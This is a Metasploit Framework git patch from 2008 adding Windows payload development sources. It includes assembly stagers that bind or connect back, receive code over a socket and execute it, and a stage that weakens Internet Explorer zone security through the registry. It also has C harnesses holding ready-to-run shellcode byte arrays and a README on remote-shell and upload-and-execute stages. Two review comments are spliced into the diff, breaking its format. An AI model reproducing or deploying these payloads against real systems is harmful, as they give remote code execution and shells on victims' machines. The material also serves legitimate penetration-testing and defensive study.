From d53dd667018509bc31dfdfb5bd17a7e019de9a94 Mon Sep 17 00:00:00 2001 
From: HD Moore Date: Fri, 22 Aug 2008 06:34:57 +0000 Subject: [PATCH] Adds initial support for IPv6, including two stager. Tested Meterpreter over IPv6 stages on XP and Vista. Using this is still tricky, I will add a wiki page tomorrow to explain the ScopeID stuff for link-local testing. This commit also includes the raw (oversized) assembler for the stagers as well as the entire old metasploit assembly set (useful for development). git-svn-id: file:///home/svn/framework3/trunk@5635 4d416f70-5f16-0410-b530-b9f4589650da --- external/source/shellcode/windows/README | 18 ++ external/source/shellcode/windows/msf2/README | 53 ++++ .../shellcode/windows/msf2/passivex.asm | 176 ++++++++++++++ .../windows/msf2/win32_reverse_read.bin | Bin 0 -> 277 bytes .../windows/msf2/win32_reverse_read.c | 28 +++ .../windows/msf2/win32_reverse_read.elf | Bin 0 -> 979 bytes .../windows/msf2/win32_reverse_read.exe | Bin 0 -> 3072 bytes .../windows/msf2/win32_reverse_read_ipv6.bin | Bin 0 -> 303 bytes .../windows/msf2/win32_reverse_read_ipv6.c | 29 +++ .../windows/msf2/win32_reverse_read_ipv6.elf | Bin 0 -> 903 bytes .../windows/msf2/win32_reverse_read_ipv6.exe | Bin 0 -> 3072 bytes .../windows/msf2/win32_stage_api.asm | 86 +++++++ .../windows/msf2/win32_stage_boot_bind.asm | 33 +++ .../msf2/win32_stage_boot_bind_inlineegg.asm | 10 + .../msf2/win32_stage_boot_bind_read.asm | 34 +++ .../msf2/win32_stage_boot_bind_read.bin | Bin 0 -> 301 bytes .../windows/msf2/win32_stage_boot_bind_read.c | 29 +++ .../msf2/win32_stage_boot_bind_read.elf | Bin 0 -> 1003 bytes .../msf2/win32_stage_boot_bind_read.exe | Bin 0 -> 3072 bytes .../msf2/win32_stage_boot_bind_shell.asm | 10 + .../windows/msf2/win32_stage_boot_reverse.asm | 37 +++ .../win32_stage_boot_reverse_inlineegg.asm | 10 + .../msf2/win32_stage_boot_reverse_read.asm | 26 ++ .../msf2/win32_stage_boot_reverse_read.bin | Bin 0 -> 283 bytes .../msf2/win32_stage_boot_reverse_read.c | 28 +++ .../msf2/win32_stage_boot_reverse_read.elf | Bin 0 -> 983 
bytes .../msf2/win32_stage_boot_reverse_read.exe | Bin 0 -> 3072 bytes .../msf2/win32_stage_boot_reverse_shell.asm | 10 + .../win32_stage_boot_reverse_shell_revert.asm | 11 + .../msf2/win32_stage_boot_reverse_udp.asm | 39 +++ .../msf2/win32_stage_boot_winsock_bind.asm | 77 ++++++ .../msf2/win32_stage_boot_winsock_conn.asm | 74 ++++++ .../win32_stage_boot_winsock_conn_udp.asm | 74 ++++++ .../windows/msf2/win32_stage_inlineegg.asm | 32 +++ .../windows/msf2/win32_stage_revert.asm | 19 ++ .../windows/msf2/win32_stage_shell.asm | 78 ++++++ .../windows/msf2/win32_stage_uploadexec.asm | 174 +++++++++++++ .../windows/msf2/win32_stage_winexec.asm | 34 +++ .../windows/stager_bind_ipv6_tcp_nx.asm | 230 ++++++++++++++++++ lib/msf/core/handler/reverse_tcp.rb | 6 +- lib/msf/core/payload.rb | 20 +- .../payloads/stagers/windows/bind_ipv6_tcp.rb | 75 ++++++ .../stagers/windows/reverse_ipv6_tcp.rb | 81 ++++++ 43 files changed, 1637 insertions(+), 4 deletions(-) create mode 100644 external/source/shellcode/windows/README create mode 100755 external/source/shellcode/windows/msf2/README create mode 100644 external/source/shellcode/windows/msf2/passivex.asm create mode 100644 external/source/shellcode/windows/msf2/win32_reverse_read.bin create mode 100644 external/source/shellcode/windows/msf2/win32_reverse_read.c create mode 100755 external/source/shellcode/windows/msf2/win32_reverse_read.elf create mode 100644 external/source/shellcode/windows/msf2/win32_reverse_read.exe create mode 100644 external/source/shellcode/windows/msf2/win32_reverse_read_ipv6.bin create mode 100644 external/source/shellcode/windows/msf2/win32_reverse_read_ipv6.c create mode 100755 external/source/shellcode/windows/msf2/win32_reverse_read_ipv6.elf create mode 100644 external/source/shellcode/windows/msf2/win32_reverse_read_ipv6.exe create mode 100644 external/source/shellcode/windows/msf2/win32_stage_api.asm create mode 100644 external/source/shellcode/windows/msf2/win32_stage_boot_bind.asm create mode 100644 
external/source/shellcode/windows/msf2/win32_stage_boot_bind_inlineegg.asm create mode 100644 external/source/shellcode/windows/msf2/win32_stage_boot_bind_read.asm create mode 100644 external/source/shellcode/windows/msf2/win32_stage_boot_bind_read.bin create mode 100644 external/source/shellcode/windows/msf2/win32_stage_boot_bind_read.c create mode 100755 external/source/shellcode/windows/msf2/win32_stage_boot_bind_read.elf create mode 100644 external/source/shellcode/windows/msf2/win32_stage_boot_bind_read.exe create mode 100644 external/source/shellcode/windows/msf2/win32_stage_boot_bind_shell.asm create mode 100644 external/source/shellcode/windows/msf2/win32_stage_boot_reverse.asm create mode 100644 external/source/shellcode/windows/msf2/win32_stage_boot_reverse_inlineegg.asm create mode 100644 external/source/shellcode/windows/msf2/win32_stage_boot_reverse_read.asm create mode 100644 external/source/shellcode/windows/msf2/win32_stage_boot_reverse_read.bin create mode 100644 external/source/shellcode/windows/msf2/win32_stage_boot_reverse_read.c create mode 100755 external/source/shellcode/windows/msf2/win32_stage_boot_reverse_read.elf create mode 100644 external/source/shellcode/windows/msf2/win32_stage_boot_reverse_read.exe create mode 100644 external/source/shellcode/windows/msf2/win32_stage_boot_reverse_shell.asm create mode 100644 external/source/shellcode/windows/msf2/win32_stage_boot_reverse_shell_revert.asm create mode 100644 external/source/shellcode/windows/msf2/win32_stage_boot_reverse_udp.asm create mode 100644 external/source/shellcode/windows/msf2/win32_stage_boot_winsock_bind.asm create mode 100644 external/source/shellcode/windows/msf2/win32_stage_boot_winsock_conn.asm create mode 100644 external/source/shellcode/windows/msf2/win32_stage_boot_winsock_conn_udp.asm create mode 100644 external/source/shellcode/windows/msf2/win32_stage_inlineegg.asm create mode 100644 external/source/shellcode/windows/msf2/win32_stage_revert.asm create mode 100644 
external/source/shellcode/windows/msf2/win32_stage_shell.asm create mode 100644 external/source/shellcode/windows/msf2/win32_stage_uploadexec.asm create mode 100644 external/source/shellcode/windows/msf2/win32_stage_winexec.asm create mode 100644 external/source/shellcode/windows/stager_bind_ipv6_tcp_nx.asm create mode 100644 modules/payloads/stagers/windows/bind_ipv6_tcp.rb create mode 100644 modules/payloads/stagers/windows/reverse_ipv6_tcp.rb
diff --git a/external/source/shellcode/windows/README b/external/source/shellcode/windows/README
new file mode 100644
index 0000000000..c5e14b3a67
--- /dev/null
+++ b/external/source/shellcode/windows/README
@@ -0,0 +1,18 @@
+This directory contains the win32 payload development environment used
+for creating the payloads in version 3 of the Metasploit Framework.
+
+The 'nasm' executable must be in your path to use the included build tool.
+
+The included 'build' script automatically creates a number of file types
+each time it used to compile a payload. These file types are:
+
+ - Native ELF executable
+ - Win32 PE executable
+ - Generated C source code
+ - Raw opcodes in ".bin" format
+
+The PE executable templates were developed by 'rix' and used with permission.
+
+To use this script, simply run ./build , where the name
+does not include the ".asm" suffix. To build win32_stage_api.asm, the
+command line would be "./build win32_stage_api".
diff --git a/external/source/shellcode/windows/msf2/README b/external/source/shellcode/windows/msf2/README
new file mode 100755
index 0000000000..904de7d4fd
--- /dev/null
+++ b/external/source/shellcode/windows/msf2/README
@@ -0,0 +1,53 @@
+This directory contains the win32 payload development environment used
+for creating the payloads in version 2.2 of the Metasploit Framework.
+
+The 'nasm' executable must be in your path to use the included build tool.
+
+The included 'build' script automatically creates a number of file types
+each time it used to compile a payload. These file types are:
+
+ - Native ELF executable
+ - Win32 PE executable
+ - Generated C source code
+ - Raw opcodes in ".bin" format
+
+The PE executable templates were developed by 'rix' and used with permission.
+
+To use this script, simply run ./build , where the name
+does not include the ".asm" suffix. To build win32_stage_api.asm, the
+command line would be "./build win32_stage_api".
+
+The Win32 payloads are somewhat modular, each component includes other
+components to create the final payload. The dependency tree for the
+reverse connect shell is:
+
+win32_stage_api.asm
+ win32_stage_boot_winsock_conn.asm
+ win32_stage_boot_reverse.asm
+ win32_stage_shell.asm
+
+
+This allows the different components to be maintained invidually, shared
+among multiple payloads, and converted into multi-stage payloads almost
+instantly. This release includes the following last-stage payloads:
+
+win32_stage_shell.asm
+ Executes cmd.exe with in/out redirected to socket, this is used by
+ the reverse connect and bind stagers.
+
+win32_stage_winexec.asm
+ This payload simply executes an arbitrary command line, it can be used to
+ accomplish things such as ftp/download/execute sequences, adding a user
+ accounts, or just signaling that the exploit was successful.
+
+win32_stage_inlineegg.asm
+ Writes GetProcAddress/LoadLibaryA address to socket, then reads and execs
+ the rest of the payload from the socket. This allows us to send InlineEgg
+ generated payloads as a last stage.
+
+win32_stage_uploadexec.asm
+ Reads a file size from socket, then opens up a hidden/system local file
+ (c:\metasploit.exe) and downloads the executable from the socket into this
+ file. Once the download is complete, it then executes this file with in/out
+ redirected to the socket. This can be extremely useful when combined with
+ a self-extracting/executing rootkit or language intepreter (perl.exe).
diff --git a/external/source/shellcode/windows/msf2/passivex.asm b/external/source/shellcode/windows/msf2/passivex.asm
new file mode 100644
index 0000000000..99103632dc
--- /dev/null
+++ b/external/source/shellcode/windows/msf2/passivex.asm
@@ -0,0 +1,176 @@ +BITS 32 +GLOBAL _start + +_start: + cld + call get_find_function +strings: + db "Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3", 0x0 +reg_values: + db "1004120012011001" +url: + db "C:\progra~1\intern~1\iexplore -new", 0x0 + +get_find_function: + call startup +find_function: + pushad + mov ebp, [esp + 0x24] + mov eax, [ebp + 0x3c] + mov edi, [ebp + eax + 0x78] + add edi, ebp + mov ecx, [edi + 0x18] + mov ebx, [edi + 0x20] + add ebx, ebp +find_function_loop: + jecxz find_function_finished + dec ecx + mov esi, [ebx + ecx * 4] + add esi, ebp + compute_hash: + xor eax, eax + cdq +compute_hash_again: + lodsb + test al, al + jz compute_hash_finished + ror edx, 0xd + add edx, eax + jmp compute_hash_again +compute_hash_finished: +find_function_compare: + cmp edx, [esp + 0x28] + jnz find_function_loop + mov ebx, [edi + 0x24] + add ebx, ebp + mov cx, [ebx + 2 * ecx] + mov ebx, [edi + 0x1c] + add ebx, ebp + mov eax, [ebx + 4 * ecx] + add eax, ebp + mov [esp + 0x1c], eax +find_function_finished: + popad + retn 8 + +startup: + pop edi + pop ebx +find_kernel32: + xor edx, edx + mov eax, [fs:edx+0x30] + test eax, eax + js find_kernel32_9x +find_kernel32_nt: + mov eax, [eax + 0x0c] + mov esi, [eax + 0x1c] + lodsd + mov eax, [eax + 0x8] + jmp short find_kernel32_finished +find_kernel32_9x: + mov eax, [eax + 0x34] + add eax, byte 0x7c + mov eax, [eax + 0x3c] +find_kernel32_finished: + + mov ebp, esp +find_kernel32_symbols: + push 0x73e2d87e ; ExitProcess + push eax + push 0x16b3fe72 ; CreateProcessA + push eax + push 0xec0e4e8e ; LoadLibraryA + push eax + call edi + xchg eax, esi + call edi + mov [ebp], eax + call edi + mov [ebp + 0x4], eax + +load_advapi32: + push edx + push 0x32336970 + push 0x61766461 + push esp + call esi + +resolve_advapi32_symbols: + push 0x02922ba9 + push eax + push 0x2d1c9add + push eax + call edi + mov [ebp + 0x8], eax + call edi + xchg eax, edi + + xchg esi, ebx +open_key: + push esp + push esi + push 0x80000001 + 
call edi + pop ebx + add esi, byte (reg_values - strings) + + push eax + mov edi, esp +set_values: + cmp byte [esi], 'C' + jz initialize_structs + push eax + lodsd + push eax + mov eax, esp + push byte 0x4 + push edi + push byte 0x4 + push byte 0x0 + push eax + push ebx + call [ebp + 0x8] + jmp set_values + +; This is NT specific, but it lets us execute iexplore regardless +; of what drive it's installed on so long as it's on the same drive +; as the WINDOWS directory, which it should always be. +fixup_drive_letter: + mov cl, byte [0x7ffe0030] + mov byte [esi], cl + +initialize_structs: + push byte 0x54 + pop ecx + sub esp, ecx + mov edi, esp + push edi + rep stosb + pop edi + mov byte [edi], 0x44 + inc byte [edi + 0x2c] + inc byte [edi + 0x2d] + +; set lpDesktop to WinSta0\Default so that this works with non-interactive services + push 0x00746c75 + push 0x61666544 + push 0x5c306174 + push 0x536e6957 + mov [edi + 8], esp + +execute_process: + lea ebx, [edi + 0x44] + push ebx + push edi + push eax + push eax + push byte 0x10 + push eax + push eax + push eax + push esi + push eax + call [ebp] + +exit_process: + call [ebp + 0x4] diff --git a/external/source/shellcode/windows/msf2/win32_reverse_read.bin b/external/source/shellcode/windows/msf2/win32_reverse_read.bin new file mode 100644 index 0000000000000000000000000000000000000000..00f1106b13939eb47af8c12038dd7a0fbdef0d7d GIT binary patch literal 277 zcmaD6#=yW392yqhoueYr?P}8(-@t}nL z;CWug`ZHi|bkVul4@Dr7mtg&lmx Z2E-g;Sq%R}c{&egF@yyJr6m4e1^_gubPoUk literal 0 HcmV?d00001 diff --git a/external/source/shellcode/windows/msf2/win32_reverse_read.c b/external/source/shellcode/windows/msf2/win32_reverse_read.c new file mode 100644 index 0000000000..95aeb8b65d --- /dev/null +++ b/external/source/shellcode/windows/msf2/win32_reverse_read.c 
@@ -0,0 +1,28 @@ + +char code[] = +"\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c" +"\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32" +"\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07" +"\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24" +"\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8" +"\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64" +"\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e" +"\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff\xd6\x81" +"\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x1f\x00\x00\x00" +"\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4\x19\x70\xe9\xec\xf9\xaa\x60" +"\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32\x00\x5b" +"\x8d\x4b\x18\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x05\x59" +"\x51\x53\xff\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b\x27" +"\x54\xff\x37\xff\x55\x28\x31\xc0\x50\x50\x50\x50\x40\x50\x40\x50" +"\xff\x55\x24\x89\xc7\x68\x7f\x00\x00\x01\x68\x02\x00\x22\x11\x89" +"\xe1\x6a\x10\x51\x57\xff\x55\x20\x6a\x40\x5e\x56\xc1\xe6\x06\x56" +"\xc1\xe6\x08\x56\x6a\x00\xff\x55\x0c\x89\xc3\x6a\x00\x56\x53\x57" +"\xff\x55\x18\xff\xd3"; + + +int main(int argc, char **argv) +{ + int (*funct)(); + funct = (int (*)()) code; + (int)(*funct)(); +} 
diff --git a/external/source/shellcode/windows/msf2/win32_reverse_read.elf b/external/source/shellcode/windows/msf2/win32_reverse_read.elf new file mode 100755 index 0000000000000000000000000000000000000000..1c3db3899cb7571fefdaed92d58a56b1f0a33e49 GIT binary patch literal 979 zcmah{&ubGw6n>j*+7zOskU~NWMhP@1gysj>QV;b|K`W(U^MfRqH8CsclEjkTU<9G{ zxD2iKKghw8D0-=QOzk0{2Md3l}iAG13XJHpWZ(s)5lDzz? z2=PRclzeV7e~!d#b?!U4NFs#$8Kein=ELa^>hSifV_d7VKYQEfs_l`q zkLz3~js=pQ;5vjST)SflHpT3f%yTvfEfnCIszs`ve~49>S*{_t*QLm2cg@53ar&`Sa-IkAvBy5E8>7$gD58qx7xz zUfWr(xnx@^D$vMX8s}3QzwvSZ%w&w7rE!0-xr8={AC3F8R&f=8D_Y>xsJ16Nqe&X~ z%5&Mo_Lm`adqM^pcW65@Bm|V)^fknal6O&3Z!Q-k?|DU$%K4I1^-cw5rUT&_fPiwV ztmg6<)v6wgMy5)26$008l*>{@J?ipJ`Z(tJ>-he9Z!|EDF`{qy>^(b)qlxbI1-m!H z3~dw%t3hIXgTiSOHs-O|Z^54W3&9i2Sg#GEvwmW=N6^jtH4uc6GtAh}z~;z$ongK6 z|0~u*m6>j?!0_R2w&JPGb$IwqUAUdGzY|qwN-%~QzCQ*iMQR>;jyN!8=!Qh}Kq;L5<@!^jHbg6Rhg%#7TO zKqeCqgB&J+gcX2nkn2EVKzWcf2*7BD1Ox}99UDLq4`5)>z@~`CVtOU16(vABq(T0K z`UT+$h~)_k3=i~*QW8rN85lsy7!-gQAb)vWAUJb{or|C#^bL)S=XqDls@c^ zQek|Z*3IMH9VNr~x|^k&@x^NcN zAM5a7qj+N@hUi{ziNOEYJMVWM?kyF`VvP(8{%_L%Ka?f1lcn#`CvEkR|K|TgH4F~~ z0D%J#{ts2@Jf2Yx%s?4T3`&BX53>XU!~cgWWI4oz9elrFiFKQ6rFu3E5TCSTwErUkQ8ImC|8vjEw+NkDe4N%<<1pk4+4ahct@*$!K(gG@e r>dKG(AklgT*NV)NfTH~5RA7U`+cn6~)yLRK&&9_Fp=Xpe_(K2yT&A)x literal 0 HcmV?d00001 
diff --git a/external/source/shellcode/windows/msf2/win32_reverse_read_ipv6.bin b/external/source/shellcode/windows/msf2/win32_reverse_read_ipv6.bin new file mode 100644 index 0000000000000000000000000000000000000000..d47ff259085e96ef1e1423807fe5cbd618a7ff7d GIT binary patch literal 303 zcmaD6#=yW392yqhoueYr?P}8(-@t}nL z;CWug`ZHi|bkVutlQV)8lpp}xa`5*~qvuRe+C5a`w!3cu! zxIEglH~#=nqIlDzsXYYr;6bT)@>`>cf&~vk>2qF^t&1lI=FR-(H*em@%+2{r=NX1U zhFFjlQB-KLjwslVV=9UQ5Dy{ym>=dt4gzgM4pkcsx`xdD(o2CWBvWZz33~AS8Jw^+ znQ!=_2WJCJ|3l;gj$-BqPj>mvz0+^C1DnqeGTr{p+>M~S@eXH$O#cdYF5s-6>0=f% zy}pI-i22L8Ck~WX!kH5G;+zxb{Md(c4xzlZcxXVj^{!A(Jbkc1wr>sSYhvk?pnvKe zfvcVhXuUg>Z2t<{EGv1Q@{iMC0S z&FJjf`<>%ciL%9l5J`skPAnEv>Hud9`XVu%5q>))~+p=yTn~h~*;y_; zb0QKBpW^v2j}WI`uWC{etX3b{vf*iRQ$yU+)oN9)X~S#$=i-Ar_#Wu-sQ(49Cuv|T zMr)4(Hid`14;e`&?lAaPQ~VKZI%dK~4Qk<2_vIyk79cuL>{#j96QJgL2>{a&GsLK8 zV6&z3Oz~*C|1wrM*}RWMKZzS?Bi{uq{g?K}Xuk{isedpBc-_RK%5tsI6g9cJQjs*7 blhi5_RZXgENEC~zYWQ+V(j+9xwG#RRo&LV2 literal 0 HcmV?d00001 diff --git a/external/source/shellcode/windows/msf2/win32_reverse_read_ipv6.exe b/external/source/shellcode/windows/msf2/win32_reverse_read_ipv6.exe new file mode 100644 index 0000000000000000000000000000000000000000..a55ffc721a003393b4ea31cebd230bc043e2e95c GIT binary patch literal 3072 zcmeZ`VqjorU|?VY;{X2{7wN-%~QzCQ*iMQR>;jyN!8=!Qh}Kq;L5<@!^jHbg6Rhg%#7TO zKqeCqgB&J+gcX2nkn2EVKzWcf2*7BD1Ox}99UDLq4`5)>z@~`CVtOU16(vABOhNvH z`UT+$h~)_k3=i~*QW8rN85lsy7!-gQAb)vWAUJb{or|C#^bL)S=XqDls@c^ zQek|Z*3IMH9VNr~x|^k&@x^NcN zAM5a7qj+N@hUi{ziNOEYJMVWM?kyF`VvP(8{%_L%Ka?f1lcn#`CvEkR3?^X8{~xMh zcpxAkAd4-FF-!b^s7mMY7cxN8#ldA91H-=tAO{GTq?7;uo3Y;vl%XQCWCFwghbm+_ z#DyJv#s3k;*n8*kQD->@lRH;4I51w zpt>Ch{sVy-qV)`}6`3UgMfu68zy^i4YmlF-kFk-Si;oXN K&nRo~hX4Q^iMNRW literal 0 HcmV?d00001 diff --git a/external/source/shellcode/windows/msf2/win32_stage_api.asm b/external/source/shellcode/windows/msf2/win32_stage_api.asm new file mode 100644 index 0000000000..bea70bfe12 --- /dev/null 
+++ b/external/source/shellcode/windows/msf2/win32_stage_api.asm
@@ -0,0 +1,86 @@
+; Title: Win32 API Loader
+; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
+; Author: hdm[at]metasploit.com
+
+[BITS 32]
+
+global _start
+_start:
+
+ call LKernel32Base
+
+LGetProcAddress:
+ push ebx
+ push ebp
+ push esi
+ push edi
+ mov ebp, [esp + 24]
+ mov eax, [ebp + 0x3c]
+ mov edx, [ebp + eax + 120]
+ add edx, ebp
+ mov ecx, [edx + 24]
+ mov ebx, [edx + 32]
+ add ebx, ebp
+
+LFnlp:
+ jecxz LNtfnd
+ dec ecx
+ mov esi, [ebx + ecx * 4]
+ add esi, ebp
+ xor edi, edi
+ cld
+
+LHshlp:
+ xor eax, eax
+ lodsb
+ cmp al, ah
+ je LFnd
+ ror edi, 13
+ add edi, eax
+ jmp short LHshlp
+
+LFnd:
+ cmp edi, [esp + 20]
+ jnz LFnlp
+ mov ebx, [edx + 36]
+ add ebx, ebp
+ mov cx, [ebx + 2 * ecx]
+ mov ebx, [edx + 28]
+ add ebx, ebp
+ mov eax, [ebx + 4 * ecx]
+ add eax, ebp
+ jmp short LDone
+
+LNtfnd:
+ xor eax, eax
+
+LDone:
+ pop edi
+ pop esi
+ pop ebp
+ pop ebx
+ ret 8
+
+LKernel32Base:
+ pop esi
+ push byte 0x30
+ pop ecx
+ mov ebx, [fs:ecx]
+ mov ebx, [ebx + 0x0c]
+ mov ebx, [ebx + 0x1c]
+ mov ebx, [ebx]
+ mov ebx, [ebx + 0x08]
+
+ push ebx ; kernel32.dll base
+ push 0xec0e4e8e ; LoadLibraryA
+ call esi ; GetProcAddress(kerne32.dll, LoadLibrary)
+ mov edi, eax
+
+ push ebx ; kernel32.dll base
+ push 0x91afca54 ; VirtualAlloc
+ call esi ; GetProcAddress(kerne32.dll, VirtualAlloc)
+
+ ; ebx = kernel32.dll base
+ ; esi = LGetProcAddress
+ ; edi = LoadLibraryA
+ ; eax = VirtualAlloc
diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_bind.asm b/external/source/shellcode/windows/msf2/win32_stage_boot_bind.asm
new file mode 100644
index 0000000000..8addaeaa78
--- /dev/null
+++ b/external/source/shellcode/windows/msf2/win32_stage_boot_bind.asm
@@ -0,0 +1,33 @@
+; Title: Win32 Reverse Connect Payload
+; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
+; Author: hdm[at]metasploit.com
+
+
+
+[BITS 32]
+
+%include "win32_stage_boot_winsock_bind.asm"
+
+
+LBind:
+ xor ebx, ebx
+ push ebx
+ push ebx
+ push dword 0x11220002 ; port 8721
+ mov eax, esp
+ push byte 0x10 ; length
+ push eax
+ push edi
+ call FN_BIND
+
+LListen:
+ push ebx
+ push edi
+ call FN_LISTEN
+
+LAccept:
+ push ebx
+ push esp
+ push edi
+ call FN_ACCEPT
+ mov edi, eax
diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_bind_inlineegg.asm b/external/source/shellcode/windows/msf2/win32_stage_boot_bind_inlineegg.asm
new file mode 100644
index 0000000000..7ae75c6f6d
--- /dev/null
+++ b/external/source/shellcode/windows/msf2/win32_stage_boot_bind_inlineegg.asm
@@ -0,0 +1,10 @@
+; Title: Win32 Reverse Connect Read Payload
+; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
+; Author: hdm[at]metasploit.com
+
+
+
+[BITS 32]
+
+%include "win32_stage_boot_bind.asm"
+%include "win32_stage_inlineegg.asm"
diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_bind_read.asm b/external/source/shellcode/windows/msf2/win32_stage_boot_bind_read.asm
new file mode 100644
index 0000000000..8722a7c654
--- /dev/null
+++ b/external/source/shellcode/windows/msf2/win32_stage_boot_bind_read.asm
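Review bot: The `; Title:` header of win32_stage_boot_bind.asm says "Win32 Reverse Connect Payload", but the body calls FN_BIND, FN_LISTEN and FN_ACCEPT, so the file implements the listening (bind) variant and the header is wrong. The same mismatch is in win32_stage_boot_bind_inlineegg.asm and win32_stage_boot_bind_read.asm, both titled "Win32 Reverse Connect Read Payload" while including win32_stage_boot_bind.asm. Anyone auditing these sources, or matching them against the generated binaries committed next to them, is pointed at the wrong network behaviour by the header. Suggest `; Title: Win32 Bind Payload` here and the corresponding bind titles in the other two files.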
@@ -0,0 +1,34 @@ +; Title: Win32 Reverse Connect Read Payload +; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003 +; Author: hdm[at]metasploit.com + + + +[BITS 32] + +%include "win32_stage_boot_bind.asm" + +LAllocateMemory: ; VirtualAlloc(NULL,size,MEM_COMMIT,PAGE_EXECUTE_READWRITE) + + push byte 0x40 + pop esi + push esi ; PAGE_EXECUTE_READWRITE=0x40 + + shl esi, 6 ; MEM_COMMIT=0x1000 + push esi + + shl esi, 8 ; 1MB + push esi + + push byte 0x00 ; NULL + call [ebp+12] + mov ebx, eax + + +LRecvLength: ; recv(s, buff, 4, 0) + push byte 0x00 ; flags + push 4096 ; length + push ebx ; buffer + push dword edi ; socket + call FN_RECV ; recv() + call ebx diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_bind_read.bin b/external/source/shellcode/windows/msf2/win32_stage_boot_bind_read.bin new file mode 100644 index 0000000000000000000000000000000000000000..cab4531bcef3d82bc62d8f57ea0db534fdbb27b1 GIT binary patch literal 301 zcmaD6#=yW392yqhoueYr?P}8(-@t}nL z;CWugz(&I5BHXeWU)sE z2LCtd{~yW{*~!xP=##d3$ba+yp$3Kr0)W5)2>*xbbRIXn9UPp&#GoYD`5;RmApC!* uN-&Vn2o3>~3Z2KZ9OA+bK4Sx7j<76-|DimchqD+m7zBU;1XLjL|1tp8t$uO< literal 0 HcmV?d00001 diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_bind_read.c b/external/source/shellcode/windows/msf2/win32_stage_boot_bind_read.c new file mode 100644 index 0000000000..b288941939 --- /dev/null +++ b/external/source/shellcode/windows/msf2/win32_stage_boot_bind_read.c 
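Review bot: The comment on `LRecvLength` in win32_stage_boot_bind_read.asm documents the call as `recv(s, buff, 4, 0)`, but the length pushed below it is 4096, so neither the comment nor the label name matches what the code passes. Suggest `LRecvLength: ; recv(s, buff, 4096, 0)` so the documented read size agrees with the instruction `push 4096 ; length`. The other inline comments in the hunk (0x40, 0x1000 and the 1MB size produced by the two shifts) are consistent with the code.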
@@ -0,0 +1,29 @@ + +char code[] = +"\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c" +"\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32" +"\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07" +"\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24" +"\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8" +"\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64" +"\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e" +"\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff\xd6\x81" +"\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x27\x00\x00\x00" +"\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4\x19\x70\xe9\xe5\x49\x86\x49" +"\xa4\x1a\x70\xc7\xa4\xad\x2e\xe9\xd9\x09\xf5\xad\xcb\xed\xfc\x3b" +"\x57\x53\x32\x5f\x33\x32\x00\x5b\x8d\x4b\x20\x51\xff\xd7\x89\xdf" +"\x89\xc3\x8d\x75\x14\x6a\x07\x59\x51\x53\xff\x34\x8f\xff\x55\x04" +"\x59\x89\x04\x8e\xe2\xf2\x2b\x27\x54\xff\x37\xff\x55\x30\x31\xc0" +"\x50\x50\x50\x50\x40\x50\x40\x50\xff\x55\x2c\x89\xc7\x31\xdb\x53" +"\x53\x68\x02\x00\x22\x11\x89\xe0\x6a\x10\x50\x57\xff\x55\x24\x53" +"\x57\xff\x55\x28\x53\x54\x57\xff\x55\x20\x89\xc7\x6a\x40\x5e\x56" +"\xc1\xe6\x06\x56\xc1\xe6\x08\x56\x6a\x00\xff\x55\x0c\x89\xc3\x6a" +"\x00\x68\x00\x10\x00\x00\x53\x57\xff\x55\x18\xff\xd3"; + + +int main(int argc, char **argv) +{ + int (*funct)(); + funct = (int (*)()) code; + (int)(*funct)(); +} 
